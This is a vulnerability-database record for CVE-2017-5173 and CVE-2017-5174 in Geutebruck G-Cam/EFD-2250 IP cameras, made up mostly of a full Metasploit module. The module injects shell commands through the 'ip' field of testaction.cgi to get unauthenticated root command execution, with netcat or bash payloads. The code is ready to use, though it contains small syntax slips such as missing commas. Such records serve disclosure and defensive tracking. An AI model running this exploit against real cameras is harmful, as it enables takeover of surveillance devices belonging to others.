ID
VAR-E-201702-0193
CVE
cve_id: | CVE-2017-5173 | Trust: 1.5 |
cve_id: | CVE-2017-5174 | Trust: 1.5 |
EDB ID
41360
TITLE
Geutebruck 5.02024 G-Cam/EFD-2250 - 'testaction.cgi' Remote Command Execution (Metasploit) - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
Geutebruck 5.02024 G-Cam/EFD-2250 - 'testaction.cgi' Remote Command Execution (Metasploit). CVE-2017-5174CVE-2017-5173 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | geutebruck | model: | g-cam/efd-2250 | scope: | eq | version: | 5.02024 | Trust: 2.2 |
vendor: | geutebruck | model: | testaction.cgi remote | scope: | - | version: | - | Trust: 0.5 |
EXPLOIT
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Geutebruck testaction.cgi Remote Command Execution',
'Description' => %q{
This module exploits a an arbitrary command execution vulnerability. The
vulnerability exists in the /uapi-cgi/viewer/testaction.cgi page and allows an
anonymous user to execute arbitrary commands with root privileges.
Firmware <= 1.11.0.12 are concerned.
Tested on 5.02024 G-Cam/EFD-2250 running 1.11.0.12 firmware.
},
'Author' =>
[
'Davy Douhine', #CVE-2017-5173 (RCE) and metasploit module
'Florent Montel' #CVE-2017-5174 (Authentication bypass)
'Frederic Cikala' #CVE-2017-5174 (Authentication bypass)
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2017-5173' ],
[ 'CVE', '2017-5174' ],
[ 'URL', 'http://geutebruck.com' ]
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-045-02' ]
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic netcat bash',
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 16 2016'))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to webapp', '/uapi-cgi/viewer/testaction.cgi']),
], self.class)
end
def exploit
uri = normalize_uri(target_uri.path)
print_status("#{rhost}:#{rport} - Attempting to exploit...")
command = payload.encoded
res = send_request_cgi(
{
'uri' => uri,
'method' => 'POST',
'vars_post' => {
'type' => "ip",
'ip' => "eth0 1.1.1.1;#{command}",
},
})
end
end
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
'testaction.cgi' Remote Command Execution (Metasploit)
Trust: 1.0
TAGS
tag: | exploit | Trust: 0.5 |
tag: | arbitrary | Trust: 0.5 |
tag: | cgi | Trust: 0.5 |
tag: | root | Trust: 0.5 |
CREDITS
RandoriSec
Trust: 0.6
EXTERNAL IDS
db: | ICS CERT | id: | ICSA-17-045-02 | Trust: 2.7 |
db: | EXPLOIT-DB | id: | 41360 | Trust: 1.6 |
db: | NVD | id: | CVE-2017-5173 | Trust: 1.5 |
db: | NVD | id: | CVE-2017-5174 | Trust: 1.5 |
db: | EDBNET | id: | 91028 | Trust: 0.6 |
db: | 0DAYTODAY | id: | 27016 | Trust: 0.6 |
db: | EDBNET | id: | 90987 | Trust: 0.6 |
db: | PACKETSTORM | id: | 141142 | Trust: 0.5 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2017-5173 | Trust: 1.5 |
url: | https://nvd.nist.gov/vuln/detail/cve-2017-5174 | Trust: 1.5 |
url: | https://gist.github.com/ddouhine/59f92e5dde3d4003aed919409b5ac44e | Trust: 1.0 |
url: | https://www.exploit-db.com/exploits/41360/ | Trust: 0.6 |
url: | https://0day.today/exploits/27016 | Trust: 0.6 |
SOURCES
db: | PACKETSTORM | id: | 141142 |
db: | EXPLOIT-DB | id: | 41360 |
db: | EDBNET | id: | 91028 |
db: | EDBNET | id: | 90987 |
LAST UPDATE DATE
2022-07-27T09:40:04.434000+00:00
SOURCES RELEASE DATE
db: | PACKETSTORM | id: | 141142 | date: | 2017-02-17T01:01:00 |
db: | EXPLOIT-DB | id: | 41360 | date: | 2017-02-15T00:00:00 |
db: | EDBNET | id: | 91028 | date: | 2017-02-21T00:00:00 |
db: | EDBNET | id: | 90987 | date: | 2017-02-15T00:00:00 |